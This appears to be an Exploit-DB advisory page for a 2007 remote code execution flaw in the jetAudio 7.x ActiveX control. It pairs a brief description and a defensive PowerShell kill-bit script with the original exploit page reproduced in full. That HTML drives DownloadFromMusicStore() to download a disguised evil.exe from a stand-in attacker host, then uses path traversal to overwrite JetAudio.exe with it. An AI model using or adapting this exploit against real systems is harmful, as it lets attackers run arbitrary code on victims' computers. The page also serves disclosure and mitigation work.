Vendor: jetAudio
By: Krystian Kloskowski (h07)
CVSS: 7.5 (HIGH)
Type: Remote Code Execution
CWE: Unknown
Product Name: jetAudio
Affected Version From: jetAudio 7.x
Affected Version To: jetAudio 7.x
Patch Exists: NO
CPE: a:jetaudio:jetaudio:7.x
Platforms Tested: Windows (Microsoft Internet Explorer 6)
Year: 2007

jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit

This exploit targets the DownloadFromMusicStore() function in the jetAudio 7.x ActiveX control. It allows an attacker to remotely execute arbitrary code on a vulnerable system. The bug was discovered by Krystian Kloskowski (h07) and has been tested on jetAudio 7.0.3 Basic with Microsoft Internet Explorer 6.

Mitigation:

Apply the latest security patches and updates for jetAudio. Consider disabling or removing the vulnerable ActiveX control if not needed.
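One way to carry out the "disable the control" mitigation on a Windows host is Internet Explorer's kill-bit mechanism: setting the Compatibility Flags value 0x400 under the ActiveX Compatibility key for a CLSID stops IE from instantiating that control. The script below is an added example, not part of the advisory; the CLSID is the one from the exploit's object tag, and the registry paths and the 0x400 flag are the standard IE kill-bit convention. Run it from an elevated PowerShell prompt.

```powershell
# Added example: set and verify the IE kill bit for the jetAudio ActiveX control.
# CLSID copied from the exploit page; 0x400 is the documented IE kill-bit flag.
$Clsid   = '{8D1636FD-CA49-4B4E-90E4-0A20E03A15E8}'
$KillBit = 0x400

# 32-bit IE on 64-bit Windows reads the control's flags from the WOW6432Node view,
# so cover both views there; on 32-bit Windows only the native view exists.
$Paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $Paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Set-JetAudioKillBit {
    foreach ($Path in $Paths) {
        if (-not (Test-Path $Path)) {
            New-Item -Path $Path -Force | Out-Null
        }
        # Preserve any flags already present; only OR in the kill bit.
        $Current = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $Current) { $Current = 0 }
        New-ItemProperty -Path $Path -Name 'Compatibility Flags' `
            -Value ($Current -bor $KillBit) -PropertyType DWord -Force | Out-Null
    }
}

function Test-JetAudioKillBit {
    # Returns $true only when the kill bit is present in every applicable view.
    $Ok = $true
    foreach ($Path in $Paths) {
        $Flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'
        if (($Flags -band $KillBit) -ne $KillBit) { $Ok = $false }
    }
    return $Ok
}

Set-JetAudioKillBit
if (Test-JetAudioKillBit) {
    Write-Output "Kill bit set for $Clsid; Internet Explorer will no longer load the control."
} else {
    Write-Output "Kill bit missing for $Clsid in at least one registry view."
}
```

The check function can be run on its own during an audit to confirm the flag is still in place after software reinstalls or updates.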

Exploit-DB raw data:

<HTML>
<!--
jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on:
- jetAudio 7.0.3 Basic
- Microsoft Internet Explorer 6
Just for fun  ;) 
-->

<object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object>

<script>
var target = "DownloadFromMusicStore";
//>rename evil.exe evil.mp3
var url = "http://192.168.0.1/evil.mp3";
var dst = "..\\..\\..\\..\\..\\..\\..\\..\\Program Files\\JetAudio\\JetAudio.exe";
var title = "0day";
var artist = "h07";
var album = "for fun";
var genere = "exploit";
var size = 256;
var param1 = 0;
var param2 = 0;
obj[target](url, dst, title, artist, album, genere, size, param1, param2);
</script>
</HTML>

# milw0rm.com [2007-09-19]